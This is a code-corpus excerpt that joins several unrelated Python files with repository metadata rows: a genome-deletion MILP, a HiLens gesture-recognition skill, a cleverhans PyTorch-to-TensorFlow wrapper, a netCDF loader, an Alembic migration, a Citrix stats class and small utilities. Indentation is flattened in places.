if verbose:
print("add GSM constraint")
# for i in metabolites:
for i in S.keys():
label = "mass_balance_%s"%i
dot_S_v = pulp.lpSum([S[i][j] * v[j] for j in S[i].keys()])
condition = dot_S_v == 0
lp_prob += condition, label
###### cut in the genome
if verbose:
print("add cutting constraints")
lp_prob += pulp.lpSum(y[j] for j in genes) == 1, "end"
lp_prob += pulp.lpSum(x[j] for j in genes) == 1, "start"
# cut genes between start and end
# for i,gene in enumerate(genes):
# lp_prob += pulp.lpSum(x[j] for j in \
# genes[0:i+1]) - pulp.lpSum(y[j] \
# for j in genes[0:i+1]) - z[gene] == 0,\
# 'indicator' + str(gene)
# A = pulp.LpAffineExpression()
# for i,gene in enumerate(genes):
# A.addterm(x[gene],1) #pulp.lpSum(x[j] for j in genes[0:i+1])
# A.addterm(y[gene],-1)
# lp_prob += A - z[gene] == 0,'indicator' + str(gene)
lp_prob += x[genes[0]] - y[genes[0]] == z[genes[0]], 'indicator' + str(genes[0])
for i,gene in enumerate(genes):
if i == 0: continue
lp_prob += z[genes[i-1]] + x[gene] - y[gene] == z[gene],'indicator' + str(gene)
##### TUs
if verbose:
print("add TU constraint")
for gene,promoters in TUs.items():
if gene in not_shared: continue
gene = 'u_G_' + gene
len_pro = len(promoters)
#print(gene, promoters)
lp_prob += z[gene] - pulp.lpSum(z['u_G_'+j] for j in promoters) + \
(len_pro - 1) >= 0,'TU_all_'+gene
for pro in promoters:
pro = 'u_G_' + pro
lp_prob += z[gene] - z[pro] <=0, 'TU_'+gene+'_'+pro
##### some overlapped region cannot be selected as the start of deletion
if verbose:
print("add no start and essential genes")
for gene in no_start:
lp_prob += x[gene] == 0, 'no_start_'+gene
    # knock out transcription of the cut genes
for gene in genes:
label = "knockout" + str(gene)
# pdb.set_trace()
if gene in v.keys():
lp_prob += v[gene] - (1-z[gene])*M <= 0, label
##### add essential genes that cannot be deleted
for eg in essential_genes:
if eg in genes:
lp_prob += z[eg] == 0
##### add regulation genes that cannot be deleted
if reg_f != None:
for eg in reg_genes:
# remove the part joint with essential genes
if (eg in genes) and (eg not in essential_genes):
lp_prob += z[eg] == 0
##### reaction bounds
for r in me.reactions:
# (lb,up) = me.bounds[r_id]
v[r.id].lowBound = r.lower_bound
v[r.id].upBound = r.upper_bound
v['BIOMASS_step3_c'].lowBound = mu
v['BIOMASS'].lowBound = 0
v['BIOMASS'].upBound = 0
v['BIOMASS_step1_c'].lowBound = 0
v['BIOMASS_step1_c'].upBound = 0
v['BIOMASS_step2_c'].lowBound = 0
v['BIOMASS_step2_c'].upBound = 0
    # The LP file is sometimes too large to write
    # lp_prob.writeLP(lpfilename)
    # The original implementation in the paper called CPLEX from C++ directly;
    # calling an external compiled C++ executable to solve is a better option.
    # It is implemented in codebase/mingenome_ecoli.cpp
    # The current test version uses python to call the optimization
    # options = [epgap, epagap, epint, epopt, eprhs]
if solver == 'gurobi':
GUROBI_CMD_OPTIONS = [('Threads', 8), ('TimeLimit', 1800), ('FeasibilityTol',1E-9),
('OptimalityTol',1E-9),('IntFeasTol',1E-9),
('MIPGapAbs', 0), ('MIPGap', 0), ('CliqueCuts', 2)]
pulp_solver = pulp.solvers.GUROBI_CMD(path=None, keepFiles=0, mip=1, msg=0,
options=GUROBI_CMD_OPTIONS)
elif solver == 'CPLEX':
pulp_solver = pulp.solvers.CPLEX(path=None, keepFiles=0, mip=1,\
msg=1, options=['mip tolerances mipgap 0', \
'mip tolerances absmipgap 0', 'mip tolerances integrality 0',\
'simplex tolerances optimality 1E-9',\
'simplex tolerances feasibility 1E-9',], timelimit=1200)
elif solver == 'GLPK':
pulp_solver = pulp.solvers.GLPK(path=None, keepFiles=0, mip=1,\
msg=1, options=['mip tolerances mipgap 0', \
'mip tolerances absmipgap 0', 'mip tolerances integrality 0',\
'simplex tolerances optimality 1E-9',\
'simplex tolerances feasibility 1E-9',])
else:
raise ValueError('Solver name not compatible')
x_list = []
y_list = []
status = []
def iterate_solve(lp_prob,iter_count):
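        # Solve the MIP once, record and fix the selected start/end cut points, then allow one more cut for the next iteration.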
lp_prob.solve(pulp_solver)
if verbose:
print("----------- " + str(iter_count) + " ------------")
status.append(pulp.LpStatus[lp_prob.status])
if verbose:
print("Status:", pulp.LpStatus[lp_prob.status])
for v in lp_prob.variables():
if "x_u_G_" in v.name and v.varValue == 1:
xname = v.name.replace("x_","")
xname = xname.replace('_','-')
xname = xname.replace("PM-","PM_")
xname = xname.replace('u-','u_')
xname = xname.replace('G-','G_')
#print(xname,v.name)
lp_prob += x[xname] == 1
if xname not in x_list:
x_list.append(xname)
if "y_u_G_" in v.name and v.varValue == 1:
yname = v.name.replace("y_","")
yname = yname.replace('_','-')
yname = yname.replace("PM-","PM_")
yname = yname.replace('u-','u_')
yname = yname.replace('G-','G_')
lp_prob += y[yname] == 1
if yname not in y_list:
y_list.append(yname)
rhs = iter_count + 1
lp_prob.constraints['start'].changeRHS(rhs)
lp_prob.constraints['end'].changeRHS(rhs)
return lp_prob
for iter_count in range(1,iterations):
#Updates the lp_prob at each iteration
lp_prob = iterate_solve(lp_prob,iter_count)
#Write the final results
    out_file = 'deletion_results_' + str(iterations-1) + '.csv'
writing_path = os.path.join(out_path, out_file)
pd.DataFrame({'start': x_list, 'end':y_list, 'status':status}).to_csv(writing_path)
#### analyze result
def get_all_deletions(result_df, genes_and_promoters):
#Get the start and end location, and the span of them
all_deletions = []
for i, row in result_df.iterrows():
start_element = row['start'].replace('u_G_','')
end_element = row['end'].replace('u_G_','')
#Find start and end in genome
for j, line in genes_and_promoters.iterrows():
if start_element == line['gene_or_promoter']:
start = line['start']
if end_element == line['gene_or_promoter']:
end = line['end']
all_deletions.append((start,end, abs(start-end)))
deletions_loc = pd.DataFrame.from_records(all_deletions, columns=['start_loc','end_loc','length'])
return all_deletions
def get_genes_in_results(all_deletions, genes_and_promoters):
#Get all the genes in the results
deleted_genes = []
for t in all_deletions:
# '+' strand deletion
if t[1] - t[0] > 0:
start = t[0]
end = t[1]
# '-' strand deletions
elif t[1] - t[0] < 0:
start = t[1]
end = t[0]
#Find the genes within those boundaries
deleted_genes.append([g for g in genes_and_promoters['gene_or_promoter'][(genes_and_promoters['start'] > start)\
& (genes_and_promoters['end'] < end)\
& (genes_and_promoters['class'] == 'genes')]])
all_deleted_genes = []
for l in deleted_genes:
for g in l:
all_deleted_genes.append(g)
return list(set(all_deleted_genes))
def calculate_mcc(all_deleted_genes, comparison_syn3):
from math import sqrt
def get_confusion_matrix(all_deleted_genes, new_baby_sheet):
#Make the comparisons now
#Number of deleted genes absent from syn3.0 (true positives)
true_positives = set(all_deleted_genes).intersection(set(new_baby_sheet['locus_tag'][new_baby_sheet['syn3.0'] == 'thrash'].to_list()))
#Number of deleted genes that are in syn3.0 (false positives)
false_positives = set(all_deleted_genes).intersection(set(new_baby_sheet['locus_tag'][new_baby_sheet['syn3.0'] == 'keep'].to_list()))
#Number of non-deleted genes that are in syn3.0 (true negatives)
all_florum_genes = set(new_baby_sheet['locus_tag'].to_list())
non_deleted_genes = all_florum_genes.difference(set(all_deleted_genes))
true_negatives = non_deleted_genes.intersection(set(new_baby_sheet['locus_tag'][new_baby_sheet['syn3.0']=='keep'].to_list()))
#Number of non-deleted genes that are missing in syn3.0 (false negatives)
false_negatives = non_deleted_genes.intersection(set(new_baby_sheet['locus_tag'][new_baby_sheet['syn3.0']=='thrash']))
return len(true_positives), len(false_positives), len(true_negatives), len(false_negatives)
tp, fp, tn, fn = get_confusion_matrix(all_deleted_genes, comparison_syn3)
num = float((tp*tn)-(fp*fn))
denom = float(sqrt((tp+fp)*(tp+fn)*(tn+fp)*(tn+fn)))
mcc = num/denom
return mcc
def get_deletion_results(max_deletion_df, genes_and_promoters, comparison_syn3):
all_deletion_results, old_all_deleted_genes = [], []
all_deletions = get_all_deletions(max_deletion_df, genes_and_promoters)
for i in tqdm(range(len(max_deletion_df))):
result_df = max_deletion_df.iloc[:i,:]
if result_df.empty:
pass
else:
new_all_deleted_genes = get_genes_in_results(all_deletions[:i], genes_and_promoters)
deleted_genes_in_deletion = list(set(new_all_deleted_genes).difference(set(old_all_deleted_genes)))
old_all_deleted_genes = new_all_deleted_genes
mcc = calculate_mcc(old_all_deleted_genes, comparison_syn3)
# Generate the deletions results for this iteration
all_deletion_results.append((len(old_all_deleted_genes),
deleted_genes_in_deletion,
sum([t[2] for t in all_deletions[:i]]),
mcc))
return all_deletion_results
| 42.764574
| 196
| 0.531275
|
1e85a2c32a4b035641275ebdb0f9d2fbe58b6e99
| 499
|
py
|
Python
|
p3.py
|
geetharamson/problemset-pands
|
16fff4c8feea674232c03d96881196c866318e93
|
[
"Apache-2.0"
] | null | null | null |
p3.py
|
geetharamson/problemset-pands
|
16fff4c8feea674232c03d96881196c866318e93
|
[
"Apache-2.0"
] | null | null | null |
p3.py
|
geetharamson/problemset-pands
|
16fff4c8feea674232c03d96881196c866318e93
|
[
"Apache-2.0"
] | null | null | null |
# Geetha Karthikesan, 2019
# divisors.py
# Program to output the numbers between 1000 and 10000 that are divisible by 6 but not by 12
# Use a for loop with n ranging over 1000 to 10000
for n in range (1000, 10000):
    # Check whether the number is divisible by 6 but not by 12, using the remainders
if n % 6 ==0 and n % 12 != 0 :
# print n
print (n)
    # (the for loop advances n automatically, so no manual increment is needed)
# Reference
# https://www.geeksforgeeks.org
# python tutorial
| 29.352941
| 103
| 0.653307
|
f83f3eeff2925906fb987a4084595eed43f740ed
| 2,786
|
py
|
Python
|
python_roms_modules/emooring.py
|
NoeLahaye/InTideScat_JGR
|
6849e82b3cda816ca7bdc6ab207e2c857a3f5f5f
|
[
"CC0-1.0"
] | null | null | null |
python_roms_modules/emooring.py
|
NoeLahaye/InTideScat_JGR
|
6849e82b3cda816ca7bdc6ab207e2c857a3f5f5f
|
[
"CC0-1.0"
] | null | null | null |
python_roms_modules/emooring.py
|
NoeLahaye/InTideScat_JGR
|
6849e82b3cda816ca7bdc6ab207e2c857a3f5f5f
|
[
"CC0-1.0"
] | null | null | null |
from netCDF4 import Dataset
import numpy as np
class emooring(object):
""" class containing all variables from a virtual mooring taken from a simulation
copy variables data ("ndplusArray" instance objects) and some meta_informations """
def __init__(self,ncfile,itmin=None,itmax=None):
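        # Load all variables from the mooring netCDF file, restricting time-dependent ones to the index range [itmin, itmax).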
nc = Dataset(ncfile,'r')
ncvar = nc.variables
if itmin is None:
try:
itmin = np.where(ncvar['time'][:].mask==False)[0][0]
except:
itmin = 0
if itmax is None:
try:
itmax = np.where(ncvar['time'][:].mask==False)[0][-1] + 1
except:
itmax = nc.dimensions['time'].size
# copy variables
self.variables = {}
for nam, val in ncvar.items():
if 'time' in val.dimensions:# and val.ndim>1:
inds = tuple([slice(itmin,itmax)]+[slice(0,ind) for ind in val.shape[1:]])
setattr(self,nam,ndplusArray(val,inds))
elif 'time' not in val.dimensions:
setattr(self,nam,ndplusArray(val))
self.variables[nam] = getattr(self,nam)
# copy attributes (and create some)
for att in ["hcoord_section","simul","date_beg","date_end"]:
if att in nc.ncattrs():
setattr(self,att,nc.getncattr(att))
self.nt = itmax - itmin
self.nx = nc.dimensions['xi_rho'].size
self.ny = nc.dimensions['eta_rho'].size
nc.close()
#class var_from_netCDF(np.ndarray):
#""" class to store data from netCDF file with attributes """
#def __init__(self,ncvar,indices=None):
#if indices is None:
#self = ncvar[:]
#else:
#self = ncvar[indices]
#self.dims = ncvar.dimensions
#for att in self.ncattrs():
#setattr(self,att,ncvar.getncattr(att))
class ndplusArray(np.ndarray):
""" subclass of ndarray for taking netCDF variables with variable attributes
see https://docs.scipy.org/doc/numpy/user/basics.subclassing.html """
def __new__(cls,ncvar,indices=None):
if indices is None:
indices = tuple([slice(0,ind) for ind in ncvar.shape])
if isinstance(ncvar[indices],np.ma.masked_array):
data = ncvar[indices].astype(float).filled(np.nan)
else:
data = ncvar[indices]
obj = np.asarray(data).view(cls)
attrs = {key:ncvar.getncattr(key) for key in ncvar.ncattrs()}
obj.ncattrs = attrs
for key,val in attrs.items():
setattr(obj,key,val)
return obj
def __array_finalize__(self,obj):
if obj is None: return
self.ncattrs = getattr(obj,"ncattrs",None)
| 37.648649
| 90
| 0.570711
|
bf2ffade5340ea9139f48c7a5cca2fb7aa149ab2
| 1,131
|
py
|
Python
|
python/twicorder/web/migrations/versions/2b7189e2db00_users_table.py
|
thimic/twicorder
|
f3ae11501f5e9fa6b7eecefcf2a652e99c711bc0
|
[
"MIT"
] | 2
|
2020-01-22T23:22:50.000Z
|
2020-02-02T05:56:08.000Z
|
python/twicorder/web/migrations/versions/2b7189e2db00_users_table.py
|
thimic/twicorder
|
f3ae11501f5e9fa6b7eecefcf2a652e99c711bc0
|
[
"MIT"
] | 1
|
2018-03-28T19:53:11.000Z
|
2018-03-28T19:53:11.000Z
|
python/twicorder/web/migrations/versions/2b7189e2db00_users_table.py
|
thimic/twicorder
|
f3ae11501f5e9fa6b7eecefcf2a652e99c711bc0
|
[
"MIT"
] | null | null | null |
"""users table
Revision ID: 2b7189e2db00
Revises:
Create Date: 2020-07-29 22:46:06.005235
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '2b7189e2db00'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=64), nullable=True),
sa.Column('email', sa.String(length=120), nullable=True),
sa.Column('password_hash', sa.String(length=128), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)
op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_user_username'), table_name='user')
op.drop_index(op.f('ix_user_email'), table_name='user')
op.drop_table('user')
# ### end Alembic commands ###
| 29
| 80
| 0.678161
|
a490d02cf6d5ea29e82cfc273c4d7115d1a767b2
| 2,495
|
py
|
Python
|
official_examples/技能模板/Static_Gesture_Recognition_Template/index.py
|
huaweicloud/HiLens-Lab
|
2b0613db2a40ec86c267bc69076e9fb7987fc610
|
[
"Apache-2.0"
] | 31
|
2020-01-09T11:11:35.000Z
|
2022-02-25T06:19:19.000Z
|
official_examples/技能模板/Static_Gesture_Recognition_Template/index.py
|
huaweicloud/HiLens-Lab
|
2b0613db2a40ec86c267bc69076e9fb7987fc610
|
[
"Apache-2.0"
] | null | null | null |
official_examples/技能模板/Static_Gesture_Recognition_Template/index.py
|
huaweicloud/HiLens-Lab
|
2b0613db2a40ec86c267bc69076e9fb7987fc610
|
[
"Apache-2.0"
] | 12
|
2020-01-09T16:00:32.000Z
|
2021-05-24T07:33:08.000Z
|
#! /usr/bin/python3.7
import os
import cv2
import time
import numpy as np
import hilens
from utils import *
def run():
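    # Main loop: grab camera frames, run the gesture model, display the result over HDMI, and report detections.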
    # Configure the system log level
hilens.set_log_level(hilens.ERROR)
    # Initialize the system; the parameter must match the check value entered when the skill was created
hilens.init("gesture")
    # Initialize the model
gesture_model_path = hilens.get_model_dir() + "gesture_template_model.om"
gesture_model = hilens.Model(gesture_model_path)
    # Initialize the local camera and the HDMI display
camera = hilens.VideoCapture()
display_hdmi = hilens.Display(hilens.HDMI)
    # Time of the last image upload to OBS, and the upload interval
last_upload_time = 0
upload_duration = 5
    # Read the skill configuration
skill_cfg = hilens.get_skill_config()
if skill_cfg is None or 'server_url' not in skill_cfg:
hilens.error("server_url not configured")
return
while True:
        # Read one frame from the camera (YUV NV21 format)
input_yuv = camera.read()
        # Preprocess the frame: convert to RGB and resize to the model input size
img_rgb = cv2.cvtColor(input_yuv, cv2.COLOR_YUV2RGB_NV21)
img_preprocess, img_w, img_h = preprocess(img_rgb)
        # Run model inference
output = gesture_model.infer([img_preprocess.flatten()])
        # Post-process to get the gesture regions and classes, and draw boxes on the RGB image
bboxes = get_result(output, img_w, img_h)
img_rgb = draw_boxes(img_rgb, bboxes)
        # Output the processed image to the HDMI display; it must first be converted back to YUV NV21
output_yuv = hilens.cvt_color(img_rgb, hilens.RGB2YUV_NV21)
display_hdmi.show(output_yuv)
        # Upload "OK" gesture images to OBS; to avoid storing too much data in OBS, only upload after a fixed interval
if time.time() - last_upload_time > upload_duration:
            # Crop out the "OK" gesture image (if any)
img_OK = get_OK(img_rgb, bboxes)
if img_OK is not None:
                # Upload the "OK" gesture image to OBS; the image (named with the current time) must first be converted to BGR and JPEG-encoded
img_OK = cv2.cvtColor(img_OK, cv2.COLOR_RGB2BGR)
img_OK = cv2.imencode('.jpg', img_OK)[1]
filename = time.strftime("%Y_%m_%d_%H_%M_%S", time.localtime())
ret = hilens.upload_bufer(filename+"_OK.jpg", img_OK, "write")
if ret != 0:
hilens.error("upload pic failed!")
return
last_upload_time = time.time()
        # Send the whole processed image via POST
try:
post_msg(skill_cfg['server_url'], img_rgb)
except Exception as e:
hilens.error("post data failed!")
print ("Reason : ", e)
hilens.terminate()
if __name__ == "__main__":
run()
| 30.426829
| 83
| 0.581964
|
7c954dd76f1e7dd230ee298de2cb2597f8953fb3
| 2,297
|
py
|
Python
|
commands/textchannels.py
|
nstra111/autovc
|
e73e1fea7b566721c3dce3ca6f587472e7ee9d1b
|
[
"MIT"
] | 177
|
2020-02-02T18:03:46.000Z
|
2022-03-17T06:18:43.000Z
|
commands/textchannels.py
|
zigsphere/Auto-Voice-Channels
|
6ae901728580bef4246737a6f1b9f10763badd3e
|
[
"MIT"
] | 82
|
2020-02-02T17:43:18.000Z
|
2022-03-24T20:34:55.000Z
|
commands/textchannels.py
|
zigsphere/Auto-Voice-Channels
|
6ae901728580bef4246737a6f1b9f10763badd3e
|
[
"MIT"
] | 165
|
2019-02-17T20:15:20.000Z
|
2022-03-27T23:59:23.000Z
|
import utils
from commands.base import Cmd
help_text = [
[
("Usage:", "<PREFIX><COMMAND>"),
("Description:",
"Toggle whether or not to create temporary private text channels for each voice chat, "
"for people to spam links, music bot commands, `/tts` commands, or for people without mics to type in. "
"These channels are only visible to members of each voice chat and get deleted once everyone leaves.\n\n"
"Admins of the server will be able to see **all** text channels, "
"which may look a bit ugly if you have a lot of active channels, but fear not, "
"regular members will only see the one channel assigned to their voice chat.\n\n"
"To set the channel name for all future text channels, use the `textchannelname` command.\n\n"
"**OFF** by default."),
("Note",
"As an admin it may be tricky to discern which text channel is yours, since you can see all of them and "
"they all have the same name. Simply look at the user list on the right when selecting the channel - the "
"one with the same members as the voice you're in is the one for you.\n"
"You can safely rename your specific channel to make it easier to find again, "
"but do not change the channel topic as this is used to find and delete the channel in some cases."),
]
]
async def execute(ctx, params):
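    # Toggle per-voice-chat text channel creation for this guild and report the new state.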
guild = ctx['guild']
settings = ctx['settings']
textchannels = not settings['text_channels'] if 'text_channels' in settings else True
settings['text_channels'] = textchannels
utils.set_serv_settings(guild, settings)
if textchannels:
r = "OK, from now on I'll create private text channels for each voice chat."
perms = guild.me.permissions_in(ctx['channel'])
if not perms.manage_roles:
r += ("\n:warning: Make sure I have the **Manage Roles** permission in this server and any categories that "
"contain my voice channels, otherwise I won't be able to make the text channels.")
else:
r = "Text channel creation is now **OFF** :)"
return True, r
command = Cmd(
execute=execute,
help_text=help_text,
params_required=0,
gold_required=True,
admin_required=True,
)
| 45.94
| 120
| 0.659556
|
18dc623b229c2191726ab19bd983ac1a353f200a
| 2,819
|
py
|
Python
|
cleverhans/utils_pytorch.py
|
industrysc/cleverhans
|
5ff7e42fc5379ba7dc9972f3dc85930e49b7f729
|
[
"MIT"
] | 10
|
2017-06-09T00:54:11.000Z
|
2021-07-07T14:44:02.000Z
|
cleverhans/utils_pytorch.py
|
industrysc/cleverhans
|
5ff7e42fc5379ba7dc9972f3dc85930e49b7f729
|
[
"MIT"
] | 1
|
2018-11-18T17:33:42.000Z
|
2018-11-18T17:33:42.000Z
|
cleverhans/utils_pytorch.py
|
industrysc/cleverhans
|
5ff7e42fc5379ba7dc9972f3dc85930e49b7f729
|
[
"MIT"
] | 7
|
2017-06-06T17:18:29.000Z
|
2021-02-15T11:40:46.000Z
|
"""Basic utilities for pytorch code"""
from random import getrandbits
import tensorflow as tf
import torch
from torch.autograd import Variable
# https://gist.github.com/kingspp/3ec7d9958c13b94310c1a365759aa3f4
# Pyfunc Gradient Function
def _py_func_with_gradient(func, inp, Tout, stateful=True, name=None,
grad_func=None):
"""
PyFunc defined as given by Tensorflow
:param func: Custom Function
:param inp: Function Inputs
  :param Tout: Output type of our custom function
:param stateful: Calculate Gradients when stateful is True
:param name: Name of the PyFunction
  :param grad_func: Custom gradient function
:return:
"""
# Generate random name in order to avoid conflicts with inbuilt names
rnd_name = 'PyFuncGrad-' + '%0x' % getrandbits(30 * 4)
# Register Tensorflow Gradient
tf.RegisterGradient(rnd_name)(grad_func)
# Get current graph
g = tf.get_default_graph()
# Add gradient override map
with g.gradient_override_map({"PyFunc": rnd_name,
"PyFuncStateless": rnd_name}):
return tf.py_func(func, inp, Tout, stateful=stateful, name=name)
def convert_pytorch_model_to_tf(model, out_dims=None):
"""
Convert a pytorch model into a tensorflow op that allows backprop
:param model: A pytorch nn.Model object
:param out_dims: The number of output dimensions (classes) for the model
:return: A model function that maps an input (tf.Tensor) to the
output of the model (tf.Tensor)
"""
torch_state = {
'logits': None,
'x': None,
}
if not out_dims:
out_dims = list(model.modules())[-1].out_features
def _fprop_fn(x_np):
"""TODO: write this"""
x_tensor = torch.Tensor(x_np)
if torch.cuda.is_available():
x_tensor = x_tensor.cuda()
torch_state['x'] = Variable(x_tensor, requires_grad=True)
torch_state['logits'] = model(torch_state['x'])
return torch_state['logits'].data.cpu().numpy()
def _bprop_fn(x_np, grads_in_np):
"""TODO: write this"""
_fprop_fn(x_np)
grads_in_tensor = torch.Tensor(grads_in_np)
if torch.cuda.is_available():
grads_in_tensor = grads_in_tensor.cuda()
# Run our backprop through our logits to our xs
loss = torch.sum(torch_state['logits'] * grads_in_tensor)
loss.backward()
return torch_state['x'].grad.cpu().data.numpy()
def _tf_gradient_fn(op, grads_in):
"""TODO: write this"""
return tf.py_func(_bprop_fn, [op.inputs[0], grads_in],
Tout=[tf.float32])
def tf_model_fn(x_op):
"""TODO: write this"""
out = _py_func_with_gradient(_fprop_fn, [x_op], Tout=[tf.float32],
stateful=True,
grad_func=_tf_gradient_fn)[0]
out.set_shape([None, out_dims])
return out
return tf_model_fn
| 31.674157
| 74
| 0.674353
|
67563af8924b9179c2eff923c1b0a2dcae7fa3b0
| 5,550
|
py
|
Python
|
nssrc/com/citrix/netscaler/nitro/resource/stat/ns/nslimitidentifier_stats.py
|
guardicore/nitro-python
|
5346a5086134aead80968f15a41ff527adaa0ec1
|
[
"Apache-2.0"
] | null | null | null |
nssrc/com/citrix/netscaler/nitro/resource/stat/ns/nslimitidentifier_stats.py
|
guardicore/nitro-python
|
5346a5086134aead80968f15a41ff527adaa0ec1
|
[
"Apache-2.0"
] | null | null | null |
nssrc/com/citrix/netscaler/nitro/resource/stat/ns/nslimitidentifier_stats.py
|
guardicore/nitro-python
|
5346a5086134aead80968f15a41ff527adaa0ec1
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2021 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class nslimitidentifier_stats(base_resource) :
r""" Statistics for limit Indetifier resource.
"""
def __init__(self) :
self._name = None
self._pattern = None
self._clearstats = None
self._sortby = None
self._sortorder = None
self._ratelmtobjhits = 0
self._ratelmtobjdrops = 0
self._ratelmtsessionobjhits = 0
@property
def name(self) :
r"""The name of the identifier.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
r"""The name of the identifier.
"""
try :
self._name = name
except Exception as e:
raise e
@property
def pattern(self) :
r"""Pattern for the selector field, ? means field is required, * means field value does not matter, anything else is a regular pattern.
"""
try :
return self._pattern
except Exception as e:
raise e
@pattern.setter
def pattern(self, pattern) :
r"""Pattern for the selector field, ? means field is required, * means field value does not matter, anything else is a regular pattern
"""
try :
self._pattern = pattern
except Exception as e:
raise e
@property
def clearstats(self) :
r"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
r"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def sortby(self) :
r"""use this argument to sort by specific key.<br/>Possible values = .
"""
try :
return self._sortby
except Exception as e:
raise e
@sortby.setter
def sortby(self, sortby) :
r"""use this argument to sort by specific key
"""
try :
self._sortby = sortby
except Exception as e:
raise e
@property
def sortorder(self) :
r"""use this argument to specify sort order.<br/>Default value: SORT_DESCENDING<br/>Possible values = ascending, descending.
"""
try :
return self._sortorder
except Exception as e:
raise e
@sortorder.setter
def sortorder(self, sortorder) :
r"""use this argument to specify sort order
"""
try :
self._sortorder = sortorder
except Exception as e:
raise e
@property
def ratelmtobjhits(self) :
r"""Total hits.
"""
try :
return self._ratelmtobjhits
except Exception as e:
raise e
@property
def ratelmtsessionobjhits(self) :
r"""Total hits.
"""
try :
return self._ratelmtsessionobjhits
except Exception as e:
raise e
@property
def ratelmtobjdrops(self) :
r"""Total drops.
"""
try :
return self._ratelmtobjdrops
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(nslimitidentifier_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.nslimitidentifier
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
r""" Use this API to fetch the statistics of all nslimitidentifier_stats resources that are configured on netscaler.
set statbindings=True in options to retrieve bindings.
"""
try :
obj = nslimitidentifier_stats()
if not name :
response = obj.stat_resources(service, option_)
else :
obj.name = name
response = obj.stat_resource(service, option_)
return response
except Exception as e:
raise e
class Clearstats:
basic = "basic"
full = "full"
class Sortorder:
ascending = "ascending"
descending = "descending"
class nslimitidentifier_response(base_response) :
def __init__(self, length=1) :
self.nslimitidentifier = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.nslimitidentifier = [nslimitidentifier_stats() for _ in range(length)]
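# Usage sketch (commented out, not part of the generated module): assumes an
# authenticated nitro_service session named `client`; the identifier name is
# illustrative only.
#
#   all_stats = nslimitidentifier_stats.get(client)              # every identifier
#   one = nslimitidentifier_stats.get(client, name="my_limit")   # single identifier
#   print(one[0].ratelmtobjhits, one[0].ratelmtobjdrops)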
| 25.694444
| 140
| 0.708829
|
09eabdd060d5be264e5f10529d38b3c7a7a92ca6
| 831
|
py
|
Python
|
src/api/modules/tumblr_manager.py
|
jelly-ape/dts_server
|
e770e7fc5b960f551f6008f70388ab63e98f876b
|
[
"MIT"
] | null | null | null |
src/api/modules/tumblr_manager.py
|
jelly-ape/dts_server
|
e770e7fc5b960f551f6008f70388ab63e98f876b
|
[
"MIT"
] | null | null | null |
src/api/modules/tumblr_manager.py
|
jelly-ape/dts_server
|
e770e7fc5b960f551f6008f70388ab63e98f876b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import pymongo
import os
try:
import ujson as json
except ImportError:
import json
import api.libs.utils
@api.libs.utils.singleton
class TumblrManager(object):
def __init__(self):
self._photos = self.__load()
def __load(self):
photos = []
photo_file = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
'../../../data',
'some',
)
with open(photo_file) as f:
for line in f:
line = line.strip()
js = json.loads(line)
photos.append(js)
return photos
def get(self, **kwargs):
skip = int(kwargs.get('skip', 0))
limit = int(kwargs.get('max', 20))
return self._photos[skip: skip + limit]
| 21.868421
| 55
| 0.540313
|
d69f0df8984a73c116e5f517cee5a519e104a123
| 2,859
|
py
|
Python
|
flagstatus.py
|
FlyBoy8869/flagstatus
|
fae205aa63957ab926f1164f845755f08a446d9c
|
[
"MIT"
] | null | null | null |
flagstatus.py
|
FlyBoy8869/flagstatus
|
fae205aa63957ab926f1164f845755f08a446d9c
|
[
"MIT"
] | null | null | null |
flagstatus.py
|
FlyBoy8869/flagstatus
|
fae205aa63957ab926f1164f845755f08a446d9c
|
[
"MIT"
] | null | null | null |
from datetime import date
from enum import Enum
from tkinter import *
from tkinter import ttk
import requests
from PIL import Image, ImageTk
from tkinter_helpers import center
URL = "https://www.nh.gov/index.htm"
MARKER_1 = "icon-flag"
MARKER_2 = "full"
HTML_COMMENT_START = "<!--"
HTML_COMMENT_END = "-->"
# date format e.g., Sunday, January 01, 2022
DATE_FORMAT = '%A, %B %d, %Y'
class Status(Enum):
FULLMAST = 1
HALFMAST = 2
UNDETERMINED = 3
status_context = {
